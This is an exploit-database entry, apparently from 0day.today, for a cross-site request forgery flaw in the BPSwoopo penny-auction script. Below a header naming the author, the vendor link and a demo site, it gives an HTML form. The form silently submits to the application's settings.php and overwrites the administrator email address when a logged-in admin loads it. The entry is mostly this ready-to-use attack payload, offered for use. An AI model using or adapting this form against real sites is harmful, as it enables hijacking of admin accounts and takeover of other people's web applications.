id: 17700
date: 03/14/2012
title: BPSwoopo CSRF Vulnerability
author: Jonturk75
cves: 

# Exploit Title: BPSwoopo CSRF 
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/bpswoopo-penny-auction-script-like-swoopo/27766/
# Category::  webapps
# Demo : http://www.icloudcenter.net/demos/ICPenny/
# Greetz: Inj3ct0r Exploit DataBase 1337day.com



<form method="POST" action="target.com/[PATH]/settings.php" name="conf">
<input type="text" value="admin@your_domain.com" maxlength="100" size="45" name="adminmail"/>
<input type="submit" value="Save changes" name="act"/>



#  0day.today [2023-03-26]  #